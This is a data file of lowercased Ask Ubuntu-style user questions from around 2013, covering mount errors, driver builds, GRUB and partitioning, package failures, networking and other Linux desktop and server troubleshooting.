372445	`` wrong fs type , bad option , bad superblock '' error while mounting fat drives	i am unable to mount any fat32 or fat16 formatted usb disks under ubuntu 13.10 . the thing here to note is that it is happening only with fat formatted disks . ntfs , ext formatted external usb disks work well ( i tried formatting the same with ext4 and it worked ) while mounting via nautilus : error while mounting from terminal : root @ shubham-pc : ~ # mount -t vfat /dev/sdc1 /media/shubham/n mount : wrong fs type , bad option , bad superblock on /dev/sdc1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so as suggested by the error : output from dmesg | tail root @ shubham-pc : ~ # dmesg | tail [ 3545.482598 ] scsi8 : usb-storage 1-1:1.0 [ 3546.481530 ] scsi 8:0:0:0 : direct-access sandisk cruzer 1.26 pq : 0 ansi : 5 [ 3546.482373 ] sd 8:0:0:0 : attached scsi generic sg3 type 0 [ 3546.483758 ] sd 8:0:0:0 : [ sdc ] 15633408 512-byte logical blocks : ( 8.00 gb/7.45 gib ) [ 3546.485254 ] sd 8:0:0:0 : [ sdc ] write protect is off [ 3546.485262 ] sd 8:0:0:0 : [ sdc ] mode sense : 43 00 00 00 [ 3546.488314 ] sd 8:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 3546.499820 ] sdc : sdc1 [ 3546.503388 ] sd 8:0:0:0 : [ sdc ] attached scsi removable disk [ 3547.273396 ] fat-fs ( sdc1 ) : io charset iso8859-1 not found output from fsck.vfat : root @ shubham-pc : ~ # fsck.vfat /dev/sdc1 dosfsck 3.0.16 , 01 mar 2013 , fat32 , lfn /dev/sdc1 : 1 files , 1/1949978 clusters all normal tried re-creating the whole partition table and then formatting as fat32 but to no avail so the possibility of corrupted drive is ruled out . tried the same with around 4 disks or so and all have the same things
372448	ubuntu 13.10 : input language indicator in login screen disappeared , how can it be restored ?	in ubuntu 13.04 , while on the login screen there was an indicator which shows which input language your keyboard is set on at the moment but after upgrade to ubuntu 13.10 it 's gone . is there any way to restore the indicator ? thanks !
372455	zc0301 webcam driver problem with ubuntu distributions after 11.10	i 'm having problem with webcam and fed up with this search in google for answers . so i 've connected webcam to my computer having ubuntu 13.10 , and i tried to run luvcview program to simply see the output , that did n't worked gives me output error : requested frame format mjpg is not available and no fallback format was found . . then i used lsusb gives me output bus 007 device 003 : id 0ac8:301b z-star microelectronics corp. zc0301 webcam so using this link downloaded driver for my webcam . when i tried to install i.e.. , using make in this directory i downloaded it gives me error videodev.h is not available , so i used ln -s libv4l1-videodev.h videodev.h and again tried to make , here i got error which i 'm not familiar with . can any one solve this problem ************************************************************************** * building video4linux2 driver for * * zc0301 and zc0301p image processor and control chip ... * * official linux 2.6.19 is the minimum version for this driver . * * read the documentation `` zc0301.txt '' for more informations . * * type `` make help '' for a list of available targets . * ************************************************************************** make -c /lib/modules/`uname -r`/build m=/home/srinivas/zc0301-1.10 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-55-generic-pae' cc [ m ] /home/srinivas/zc0301-1.10/zc0301_core.o in file included from /usr/lib/gcc/i686-linux-gnu/4.6/include/stdint.h:5:0 , from /usr/local/include/libv4l1-videodev.h:13 , from /home/srinivas/zc0301-1.10/zc0301_sensor.h:26 , from /home/srinivas/zc0301-1.10/zc0301.h:43 , from /home/srinivas/zc0301-1.10/zc0301_core.c:46 : /usr/lib/gcc/i686-linux-gnu/4.6/include/stdint-gcc.h:86:26 : error : conflicting types for ‘uintptr_t’ include/linux/types.h:44:24 : note : previous declaration of ‘uintptr_t’ was here /home/srinivas/zc0301-1.10/zc0301_core.c : in function ‘zc0301_vidioc_querycap’ : /home/srinivas/zc0301-1.10/zc0301_core.c:1024:41 : error : ‘struct device’ has no member named ‘bus_id’ /home/srinivas/zc0301-1.10/zc0301_core.c : in function ‘zc0301_ioctl’ : /home/srinivas/zc0301-1.10/zc0301_core.c:1914:2 : error : implicit declaration of function ‘v4l_print_ioctl’ [ -werror=implicit-function-declaration ] /home/srinivas/zc0301-1.10/zc0301_core.c : at top level : /home/srinivas/zc0301-1.10/zc0301_core.c:1928:2 : error : unknown field ‘ioctl’ specified in initializer /home/srinivas/zc0301-1.10/zc0301_core.c:1928:2 : warning : initialization from incompatible pointer type [ enabled by default ] /home/srinivas/zc0301-1.10/zc0301_core.c:1928:2 : warning : ( near initialization for ‘zc0301_fops.fsync’ ) [ enabled by default ] /home/srinivas/zc0301-1.10/zc0301_core.c:1929:18 : error : ‘v4l_compat_ioctl32’ undeclared here ( not in a function ) /home/srinivas/zc0301-1.10/zc0301_core.c : in function ‘zc0301_usb_probe’ : /home/srinivas/zc0301-1.10/zc0301_core.c:1987:13 : error : ‘struct video_device’ has no member named ‘owner’ /home/srinivas/zc0301-1.10/zc0301_core.c:1988:13 : error : ‘struct video_device’ has no member named ‘type’ /home/srinivas/zc0301-1.10/zc0301_core.c:1989:13 : error : ‘struct video_device’ has no member named ‘hardware’ /home/srinivas/zc0301-1.10/zc0301_core.c:1990:20 : warning : assignment from incompatible pointer type [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/srinivas/zc0301-1.10/zc0301_core.o ] error 1 make [ 1 ] : *** [ _module_/home/srinivas/zc0301-1.10 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-55-generic-pae' make : *** [ modules ] error 2 any one with similar problem solved this ? or any alternative ? thanks in advance
372456	can not reset openldap directory	i need to remove every configuration/schema/database . is it possible and if so how ? so far sudo apt-get purge slapd ldap-utils remove /etc/ldap /etc/openldap /var/lib/ldap and sudo apt-get install slapd ldap-utils tried to sudo ldapadd -y external -h ldapi : /// -f backend2.example.com.ldif still getting 80 error , which means , according to my restricted knowledge , ldap already has modules and cn s in ldif file .
372458	network manager applet in gnome 3 .1x disappears when connected to the internet	when using a wired connction to connect with the internet , the network manager applet in the system status ( tray ) disappears . it comes back when the wired connection is disconnected .
372463	unable to update repository	this is the message that flashes when i try to check for updates . i was connected to the internet at the time of check . also , there is a red error symbol that shows on the dash saying that the update information is outdated . please let me know if you need anymore information to solve this issue . i use ubuntu 12.04 on an acer aspire 7735z .
372466	nothing in /dev/video0 after resume ( i.e . mplayer /dev/video0 not working )	after a resume , mplayer is not playing video from /dev/video0 as it was before suspending . i suspect that i need to kill/reset/reconfigure something related to the video card but i have no idea how and what . mplayer is showing : playing /dev/video0 but nothing else . i am using the ati radeon hd 5700 series driver which , besides that problem , is working great . how to fix this ?
372467	error while loading shared libraries : libhd.so.3.0 : can not open shared object file : no such file or directory	i am working on phantom omni haptic ( sensable ) device and using ubuntu 12.04 . i recently installed phantom device driver and when i am trying to run example program given by sensable it is giving me following error . error while loading shared libraries : libhd.so.3.0 : can not open shared object file : no such file or directory . i have libhd.so.3.0 file and i copy it in /usr/lib but it did n't solve this issue . thank you .
372468	updates broke my themes/shell [ ubuntu 12.04 running gnome 3 ]	update 09 nov 2013 : this problem was sorted out by updates that came later . i am running gnome-session 3.4.2.1 . after the latest updates ( listed below ) my theme regressed to what looks like tango - not sure . am unable to change it using gnome-tweak tool or the display settings . i am also unable to change the wallpaper . here 's what it looks like : synaptic : chromium and this is the wallpaper page even though i have selected the wallpaper , it actually does not change . this same problem occurred on my personal computer , and one other computer i have , all running the same software/config . the interesting thing is that while gnome 3 and unity are affected , cinnamon is not . what i 've done so far : purged and re-installed both gnome 3 and unity- no change noted . so , how do i fix this ? thanks here 's the installation log : start-date : 2013-11-07 12:01:28 upgrade : chromium-browser-l10n : i386 ( 28.0.1500.71-0ubuntu1.12.04.1 , 30.0.1599.114-0ubuntu0.12.04.3 ) , libswscale2 : i386 ( 0.8.6-0ubuntu0.12.04.1 , 0.8.8-0ubuntu0.12.04.1 ) , chromium-codecs-ffmpeg : i386 ( 28.0.1500.71-0ubuntu1.12.04.1 , 30.0.1599.114-0ubuntu0.12.04.3 ) , chromium-browser : i386 ( 28.0.1500.71-0ubuntu1.12.04.1 , 30.0.1599.114-0ubuntu0.12.04.3 ) , libpostproc52 : i386 ( 0.8.6-0ubuntu0.12.04.1 , 0.8.8-0ubuntu0.12.04.1 ) , libavcodec-extra-53 : i386 ( 0.8.6ubuntu0.12.04.1 , 0.8.8ubuntu0.12.04.1 ) , libavformat53 : i386 ( 0.8.6-0ubuntu0.12.04.1 , 0.8.8-0ubuntu0.12.04.1 ) , libavutil-extra-51 : i386 ( 0.8.6ubuntu0.12.04.1 , 0.8.8ubuntu0.12.04.1 ) end-date : 2013-11-07 12:02:00 start-date : 2013-11-07 17:32:55 commandline : aptdaemon role='role-commit-packages ' sender=':1.136' install : libmusicbrainz5-0 : i386 ( 5.0.1-2~precise2 ) , udisks2 : i386 ( 1.98.0-1~precise1 ) , libclutter-gst-1.0-0 : i386 ( 1.5.4-0ubuntu2 ) , libudisks2-0 : i386 ( 1.98.0-1~precise1 ) , cinnamon-session-common : i386 ( 2.0.4-20131105043005-precise ) , librhythmbox-core6 : i386 ( 2.97-1ubuntu1~precise1 ) , gcr : i386 ( 3.4.1-3~precise1 ) , libcluttergesture-0.0.2-0 : i386 ( 0.0.2.1-2ubuntu3 ) , libmx-1.0-2 : i386 ( 1.4.3-0ubuntu1 ) , guile-2.0-libs : i386 ( 2.0.5+1-1 ) , libclutter-imcontext-0.1-0 : i386 ( 0.1.4-2build1 ) , libnatpmp1 : i386 ( 20110808-3ubuntu1 ) upgrade : gnome-keyring : i386 ( 3.2.2-2ubuntu4.1 , 3.4.1-4ubuntu1~precise1 ) , cinnamon : i386 ( 2.0.6-20131026040307-precise , 2.0.10-20131105040309-precise ) , gir1.2-muffin-3.0 : i386 ( 2.0.3-20131023003029-precise , 2.0.3-20131105003012-precise ) , gir1.2-totem-1.0 : i386 ( 3.0.1-0ubuntu21.1 , 3.4.3-0ubuntu1~precise1 ) , nemo : i386 ( 2.0.2-20131023010018-precise , 2.0.5-20131105010007-precise ) , aisleriot : i386 ( 3.2.3.2-0ubuntu1 , 3.4.1-1~precise1 ) , procps : i386 ( 3.2.8-11ubuntu6.2 , 3.2.8-11ubuntu6.3 ) , libcinnamon-desktop0 : i386 ( 2.0.2-20131025011504-precise , 2.0.3-20131105011505-precise ) , libgck-1-0 : i386 ( 3.2.2-2ubuntu4.1 , 3.4.1-3~precise1 ) , totem-plugins : i386 ( 3.0.1-0ubuntu21.1 , 3.4.3-0ubuntu1~precise1 ) , cinnamon-desktop-data : i386 ( 2.0.2-20131025011504-precise , 2.0.3-20131105011505-precise ) , rhythmbox : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , libgcr-3-1 : i386 ( 3.2.2-2ubuntu4.1 , 3.4.1-3~precise1 ) , seahorse : i386 ( 3.2.2-0ubuntu2.1 , 3.4.1-2~precise1 ) , muffin-common : i386 ( 2.0.3-20131023003029-precise , 2.0.3-20131105003012-precise ) , totem-common : i386 ( 3.0.1-0ubuntu21.1 , 3.4.3-0ubuntu1~precise1 ) , libtotem0 : i386 ( 3.0.1-0ubuntu21.1 , 3.4.3-0ubuntu1~precise1 ) , rhythmbox-data : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , gir1.2-cinnamondesktop-3.0 : i386 ( 2.0.2-20131025011504-precise , 2.0.3-20131105011505-precise ) , cinnamon-session : i386 ( 2.0.1-20131021043004-precise , 2.0.4-20131105043005-precise ) , rhythmbox-mozilla : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , rhythmbox-plugin-zeitgeist : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , libmuffin0 : i386 ( 2.0.3-20131023003029-precise , 2.0.3-20131105003012-precise ) , cjs : i386 ( 2.0.0-20131021020602-precise , 2.0.0-20131105020703-precise ) , rhythmbox-plugin-cdrecorder : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , cinnamon-common : i386 ( 2.0.6-20131026040307-precise , 2.0.10-20131105040309-precise ) , gnome-disk-utility : i386 ( 3.0.2-2ubuntu7 , 3.4.1-0ubuntu1~precise1 ) , nemo-fileroller : i386 ( 2.0.0-20131021020004-precise , 2.0.0-20131105020003-precise ) , libnemo-extension1 : i386 ( 2.0.2-20131023010018-precise , 2.0.5-20131105010007-precise ) , rhythmbox-plugins : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , gimp : i386 ( 2.8.6-0precise1~ppa , 2.8.8-0precise0~ppa ) , cinnamon-settings-daemon : i386 ( 2.0.5-20131026004504-precise , 2.0.6-20131105004505-precise ) , libgimp2.0 : i386 ( 2.8.6-0precise1~ppa , 2.8.8-0precise0~ppa ) , gir1.2-rb-3.0 : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , wpasupplicant : i386 ( 0.7.3-6ubuntu2.1 , 0.7.3-6ubuntu2.2 ) , libcjs0c : i386 ( 2.0.0-20131021020602-precise , 2.0.0-20131105020703-precise ) , nemo-data : i386 ( 2.0.2-20131023010018-precise , 2.0.5-20131105010007-precise ) , totem : i386 ( 3.0.1-0ubuntu21.1 , 3.4.3-0ubuntu1~precise1 ) , gimp-data : i386 ( 2.8.6-0precise1~ppa , 2.8.8-0precise0~ppa ) , transmission-common : i386 ( 2.51-0ubuntu1.3 , 2.73-0ubuntu1~precise1 ) , cinnamon-translations : i386 ( 2.0.1-20131021040407-precise , 2.0.1-20131105040807-precise ) , totem-mozilla : i386 ( 3.0.1-0ubuntu21.1 , 3.4.3-0ubuntu1~precise1 ) , rhythmbox-plugin-magnatune : i386 ( 2.96-0ubuntu4.3 , 2.97-1ubuntu1~precise1 ) , transmission-gtk : i386 ( 2.51-0ubuntu1.3 , 2.73-0ubuntu1~precise1 ) end-date : 2013-11-07 17:34:40
372469	init has huge memory allocation after time - ubuntu 13.10	init process is taking huge amounts of memory . it starts normally with about 2 mb and if i kept the laptop running for half a day , it would reach 1.5 gb ! ! which slowly kills the performance , and causes everything to stutter and stop working properly . this only happened when i upgraded from 13.04 to 13.10 any solutions ? i really hate restarting it every while .
372473	grub unable to auto-boot when external hdd is connected	i recently bought a 3tb western digital usb hdd , which i hooked up to my ubuntu machine . the machine has no problems mounting the hdd what so ever , but around the same time i hooked it up grub started having problems auto-booting into ubuntu . it took a while for me to actually figure out that the problem was directly linked to having the hdd hooked up when booting since it 's a server machine and it usually remains powered on , but after some testing i determined that hooking up the hdd on boot is causing the problems for grub . to be honest , i am relatively new to ubuntu ( or grub for that matter ) , so i have no idea of how to fix this problem , if there is even a fix for it . has anybody had any problems like this before ? and if so , were you able to fix it ? i tried looking myself , but all my search results come up with is ways to have grub boot to usb devices and such , but nothing related to my problem . if anybody knows where i should look that would be greatly appreciated . edit -- -- -- -- -- -- -- -- -- -- - the issue seems to have resolved itself now that i rearranged my internal hard drive order . grub boots automatically , both with and without my external hdd attached . i have no idea what caused or fixed this problem though . i might have just as well been a dead raccoon lying face down on my keyboard and still know more of what actually happened ...
372475	newbie question : running a custom script in terminal	i am complete new to ubuntu , so please take it slowly : i 'm trying to datamosh a video for my glitchart work and i 've found a script ( i think it 's called script ) for doing just that . but just ca n't figure out how to make this thing work . the script i 'm trying to run was downloaded from here https : //github.com/ucnv/aviglitch any ideas ? vladi
372480	tcl error while installing wordnet	while installing wordnet , i 'm getting the following error ; stubs.c:132:14 : error : ‘tcl_interp’ has no member named ‘result’ i tried giving following ; # define use_interp_result 1 at the end of `` config.c '' file of the wordnet . then als its not working . kindly help .
372482	help with partitioning	i currently am dual booting ubuntu and windows with one hard drive running all of the ubuntu partitions including grub , and the other running all of windows and the native boot loader for them ( whatever it is called ) and accessing either one from the f12 menu ( i know its kinda jerry-rigged ) . sadly my ubuntu hard drive is 16 gb while my windows is 1 tb ( way more than i need even for win 8 ) , so my questions are ... is there anyway to partition part of the windows hard drive for ubuntu use ? i so , my current ubuntu drive has different partitions for / and home ; could i combine free space on the other hard drive with one of those so it could still be accessed in the same way but with more memory ? should i combine / and home since i am only running out of memory in / ? would any partitioning affect the boot of windows since the boot loader is on that drive also ?
372485	change a vps ' welcome message	when i log into my sudo user on an ubuntu vps , this message appears : there is a quick installer available in /usr/sbin named quickinstaller.sh . it will give you the option of installing a lamp ubuntu nooby here , but i think the .bashrc file for each user is responsible for what 's run during a login . so is the code that triggers this message in .bashrc ? how can i change this message ? could i even run a command-line program on startup to give diagnostic information maybe ?
372486	need help setting up a zte mf652 usb modem on ubuntu 12.04	i 'm very new to linux , just installed 2 days ago . i have 2 usb modems . i managed to get the telstra prepaid one set up surprisingly easy using ubuntu default network manager ( ? ) . i am not finding it so easy with my zte mf652 usb modem . this is the main one i wish to use as it is post paid and i do n't have to worry about monitoring data usage , which i have not yet discovered how . the windows zte connection manager on install/1st use only requires the service provider code , do n't need a username or password . i have tried getting all the info i can out of the settings , which only contained configuration name ( same as sp code ) and the apn , an extension of the sp code . the isp is oneseniors that uses ( i believe ) onemobile as it 's carrier name . so in the network manager i have selected onemobile ( also tried oneseniors ) as my carrier , used the apn that i got from windows and left the dail number as the default *99 # ( which worked for telstra ) . i do n't now what else to try or how to get anymore info on the settings . any help would greatly be appreciated .
372488	what do i do about my busted gui ?	i have been trying to dial down compiz 's stranglehold on my memory , and not keeping very good notes . i think all i did was reduce the texture quality in opengl , per roland taylor 's suggestion . but i did something that left my scrollbars looking totally wonky . i tried to undo that by resetting compiz to its default settings and now i have wonky looking scroll bars , i ca n't drag windows around , my windows have no decoration and i ca n't switch between applications except by pointing and clicking . as it happens i have a terminal open and visible , and this browser window , but that 's it . i was reading instructions on how can i reset compiz to the default settings ? and unity -- reset does n't work in 13.10 ( `` error : the reset option is now depricated '' ) how do i restore compiz 's defaults in 13.10 ?
372493	finding my ubuntu partition	i have dual booted windows and ubuntu 12.10 but windows boot loader takes over grub and i ca n't boot ubuntu . i tried following instructions here : how can i repair grub ? ( how to get ubuntu back after installing windows ? ) but it requires knowing the partition in which ubuntu is installed . i booted using a live cd and ran a couple of commands mentioned in that link : the output of sudo fdisk -l is : warning : ignoring extra data in partition table 6 warning : ignoring extra data in partition table 6 warning : ignoring extra data in partition table 6 warning : invalid flag 0xa9c7 of partition table 6 will be corrected by w ( rite ) disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe07a620e device boot start end blocks id system /dev/sda1 * 2048 411647 204800 7 hpfs/ntfs/exfat /dev/sda2 10667160 441482264 215407552+ 7 hpfs/ntfs/exfat /dev/sda3 441482265 594196479 76357107+ f w95 ext 'd ( lba ) /dev/sda4 594198528 625142447 15471960 2 xenix root /dev/sda5 441482328 535382189 46949931 7 hpfs/ntfs/exfat /dev/sda6 ? 3966535220 2853430321 1590931199 98 unknown disk /dev/sdb : 15.6 gb , 15606349824 bytes 116 heads , 52 sectors/track , 5053 cylinders , total 30481152 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 30481151 15236544 c w95 fat32 ( lba ) and the output of df -th is : filesystem type size used avail use % mounted on /cow overlayfs 1.9g 122m 1.8g 7 % / udev devtmpfs 1.9g 12k 1.9g 1 % /dev tmpfs tmpfs 384m 836k 383m 1 % /run /dev/sdb1 vfat 15g 794m 14g 6 % /cdrom /dev/loop0 squashfs 758m 758m 0 100 % /rofs none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs tmpfs 1.9g 1.1m 1.9g 1 % /tmp none tmpfs 5.0m 4.0k 5.0m 1 % /run/lock none tmpfs 1.9g 144k 1.9g 1 % /run/shm none tmpfs 100m 32k 100m 1 % /run/user i am not sure in which partition ( sda1 ? sda2 ? sdb1 ? ) is ubuntu installed . it would be great if someone could help me with this !
372494	autentication throught digest proxy	and sometimes i need to download files ( and do other things ) throught the command line , i have always declared the enviroment variable http_proxy ( https_proxy or ftp_proxy too ) in that way : export http_proxy=http : //username : password @ address : port/ but some days ago , the network administrators started to use a digest based autentication in the proxy ( for security reasons ) and now i can access internet throught the browser , but not from the command line .
372497	suspend with dell vostro 131 notebook @ ubuntu 12.04.3 lts	when i wake my dell v-131 up from standby , the screen keeps black und the kernel seems to be crashed ( even capslock or strg+alt+f1 does n't work ) . in ubuntu 13.10 the suspend has worked without any problems . what can i do for solving this problem ? regards , arthur
372499	dns not working for external network	i have two lans 192.168.35.0/25 and 192.168.36.0/24 the two are linked with a router . on 35.0/25 i have a ubuntu dns server for servers on that lan on that lan everything works local dns and internet ( fowarding ) however on 36.0/24 the dns only resolves local addresses ( the servers ) but it does not resolve the internet ( fowards ) what am i missing ? nslookup on 3.0/25 work and resolve properly but on 36.0/24 they fail saying query refused
372506	installing xampp in xubuntu 13.10	i downloaded the xampp .run file from apacheandfriends but the installation is n't working for me . i ca n't seem to navigate to my downloads folder and it just keeps saying command not found all the time . root @ john-aspire-v3-531 : /home/john # cd ~/downloads bash : cd : /root/downloads : no such file or directory root @ john-aspire-v3-531 : /home/john # cd ~/downloads bash : cd : /root/downloads : no such file or directory root @ john-aspire-v3-531 : /home/john # /downloads bash : /downloads : no such file or directory root @ john-aspire-v3-531 : /home/john # cd /downloads bash : cd : /downloads : no such file or directory root @ john-aspire-v3-531 : /home/john # cd downloads bash : cd : downloads : no such file or directory root @ john-aspire-v3-531 : /home/john # downloads downloads : command not found what do i need to do ? apacheandfriends says to : chmod 755 xampp-linux-1.8.2-0-installer.run and then ./xampp-linux-1.8.2-0-installer.run but it does n't seem to think that the file exists . can anyone help me ?
372507	how to compile gtkmm-3.10.1 ?	i 've been trying to install the latest gtkmm 3.0 package in ubuntu 13.10 and i 've already compiled successfully the glibmm-2.38 package , but i ca n't seem to find a way to finish the compiling processes of gtkmm : it all goes well with ./autogen.sh and the with make it runs okay until it gets stuck at this line : generating docs for compound gtk : :cellarea.. btw i 'm using the gnome staging ppa aka 3.10 could anyone help me with this ? is there something i 'm missing ?
372510	intel ( r ) linux ( tm ) graphics driver error after inserting password	i download intel ( r ) linux ( tm ) graphics driver for ubuntu 13.04 x64 because i am using ubuntu 13.04 x64 , after i install it with dpkg , program is fully installed , i start it and i can choose of close or next , i click on next and all test are passing ok . checking if intel graphics card available ... ok retrieving information from 01.org ... ok checking distribution ... ok checking kernel version ... ok checking available repositories ... ok now i can choose of back , close and install , i click on install , after the program work some time , it ask me of system administrator password , i type it and press enter , the password is accepted , the program is running some time and generate 2 error windows : text of first window : error running transaction : gdbus.error : org.debian.apt.transactionfailed : error-no-package : package i915-3.9-3.8-dkms is n't available text of second window : package i915-3.9-3.8-dkms is n't available in the main window is write setting up repositories ... ok installing packages ... updating package cache ... installing packages ... failed because it does n't work ? ( now i ca n't make screenshot , the generated image is a simple gray background )
372514	how to set `` use force_addr=0x [ ok ] in 13.10 desktop 64bit ?	i just installed ubuntu 13.10 64bit as a hyper-v virtual machine on my windows 8.1 dell t3500 pc , at start it says : ... . * starting mount network fill ok lms 7.3 smbus base address unintialized - upgrade bios or use force_addr=0x [ ok ] * stopping mount network filesystems . acpid : exiting i have to hit enter to continue booting the the ubuntu desktop . what should i do ?
372515	i can not get ubuntu to boot up on windows 8	i have set the priority to usb drive , turned off fast boot , turned off secure boot . i have tried multiple times and ways . i am fairly new but from what i understand is ueif or such is different . what else do i need to do ? thanks .
372517	system speakers not recognized	since upgrading to xubuntu 13.10 , sound has not functioned properly ( e.g . screeching when playing skype notifications ) . now , however , it does not function at all . pavucontrol only shows dummy output and does not recognize the built-in speakers on my dell precision m4600 . possibly related , the sound indicator applet does not come up when i click on it , only showing a small white bar underneath it . i have purged and reinstalled pulseaudio . lspci -v shows : 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) subsystem : dell precision m4600 flags : bus master , fast devsel , latency 0 , irq 56 memory at f2560000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 01:00.1 audio device : nvidia corporation gf106 high definition audio controller ( rev a1 ) subsystem : dell device 14a3 flags : bus master , fast devsel , latency 0 , irq 17 memory at f0080000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel the `` capabilities : < access denied > '' line makes me wonder if there 's a permissions issue , as the log out applet now shows `` restart '' and `` shutdown '' grayed out . groups shows me in : kmaxwell adm dialout cdrom sudo dip plugdev fuse lpadmin netdev sambashare vboxusers
372518	how can i stop a process from moving to the background ?	i have a machine running ubuntu server version 12.04.3 lts . on it , i 'm attempting to run a node.js server that needs to stay up and running at all times . i 'm running into an issue , however , where periodically i see this happen : [ 1 ] + stopped sudo node server.js when this happens , i have to manually bring it back with fg , which works fine , at least until it stops again . as far as i can tell , it is n't functioning properly while stopped , since i get no log files in those windows of time . so my question is this : is there a way to prevent it from being stopped like that ? i 'm running it in a tmux window , if that changes anything . also , to address the question before it gets asked : i 'm running it as sudo due to some ecryptfs issues i 've been having . i was originally running it in my home directory , but when it was left alive for too long things would get out of sync and the file writes it has to do would just stop working . to mitigate that , i moved it out of my home directory , but its new location requires me to use sudo permissions for everything to work correctly . hopefully that is n't related to the whole background task thing . ( sudo and tmux tags included in case one or both turn out to actually be relevant to the solution . ) update : at the advice of a friend , i stopped running it as sudo and instead chown 'd the entire folder so that i could let it run without elevated permissions . i have yet to determine if the stopping is still happening ( just barely restarted it ) , but with any luck that will resolve my problem . the question still stands , though , if for no other reason than curiosity .
372522	my probleme about `` the installation or removal of a software package failed ''	recently , when i open ubuntu software center , it ask me repair package then i found this message . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 569135 files and directories currently installed . ) unpacking linux-image-3.5.0-42-generic ( from ... /linux-image-3.5.0-42-generic_3.5.0-42.65~precise1_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-42-generic_3.5.0-42.65~precise1_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.5.0-42-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-42-generic /boot/vmlinuz-3.5.0-42-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-42-generic /boot/vmlinuz-3.5.0-42-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-42-generic_3.5.0-42.65~precise1_amd64.deb error in function : dpkg : dependency problems prevent configuration of linux-image-generic-lts-quantal : linux-image-generic-lts-quantal depends on linux-image-3.5.0-42-generic ; however : package linux-image-3.5.0-42-generic is not installed . dpkg : error processing linux-image-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-lts-quantal : linux-generic-lts-quantal depends on linux-image-generic-lts-quantal ; however : package linux-image-generic-lts-quantal is not configured yet . dpkg : error processing linux-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured
372523	execute command on time shell script	i want to say i am a complete newbie but i want a shell script that will execute a command on a specific time for example on 6:45 am how is this done , a full example would be very useful ! thank you !
372525	wiping windows 8 completely and then replacing with unbuntu	i have tried hard and tried many ways to dual boot my windows 8 laptop with ubuntu . but have had no luck so i am deciding to wipe windows completely and just have ubuntu . i am not sure how to go about this . a set of instructions would be good . thank you !
372526	how can i use my keyboard as a mouse ?	i 'm using my keyboard more and more these days for basic command line stuff , vim editing , alt-tab window switching and the like . q ) how can i use my number pad keys to move the cursor around on the screen without using the mouse ? i looked to try and install btnx as mentioned by others but it does n't seem to exist anymore as an available package i also tried shift-numlock as mentioned by another but that did n't work either ( just turns numlock on/off ) .
372528	ios7 new `` trust this computer '' security	is there a known way to bypass the new ios7 feature that prevents me from obtaining access to my iphone5 ?
372529	packaging jre 7 binary file license questions ?	notice jre and jdk 7 have new license agreement . am i able to include binary jre without additional license ?
372530	added 2nd hdd , created new mount point for /mnt/datanew , get you are not the owner	i am completely new to linux and have been asked to extend a vm running ubuntu , i thought i would test this first so have just installed it in a test vm , i added the 2nd hard drive and used gparted to format it with ext4 so i now have a drive called /dev/sdb1 i then created a new directory called mnt/datanew i then mounted that using the below command sudo mount -t ext4 /dev/sdb1 /mnt/datanew i thought i was doing well until when i went into home folder / file system mnt / datanew i noticed i could n't create a new folder etc , i check the properties and it said i do n't have permission as its all root how do i change this , i need to create some data and then test extending the partition as i want to see if it has any impact .
372536	what is the latest version of unity-2d	i would like to have the latest version of unity-2d installed on my system . i can see some references to a version 6 in some places e.g . http : //changelogs.ubuntu.com/changelogs/pool/main/u/unity-2d/ but all i can grab from the repos is version 5.14 , after that it 's related as dummy packages . i would like to put my hands in the latest unity-2d code available . please help me
372541	how can i calibrate my printer using the latex test page ?	i am trying to print a latex compiled document but my printer does n't print the top part . it seems that the top part is outside of the printing range . to debug this problem i have printed the latex test page ( /usr/share/texmf-texlive/tex/latex/base/testpage.tex ) and it turns out that my printer is placing the content about 4.5mm closer to the top of the page than it should . how can i calibrate my printer/driver so that it will place the content where it is supposed to go ? i am using an hp officetjet 7300 printer with hplip . the hp-linefeedcal application is not available for this printer .
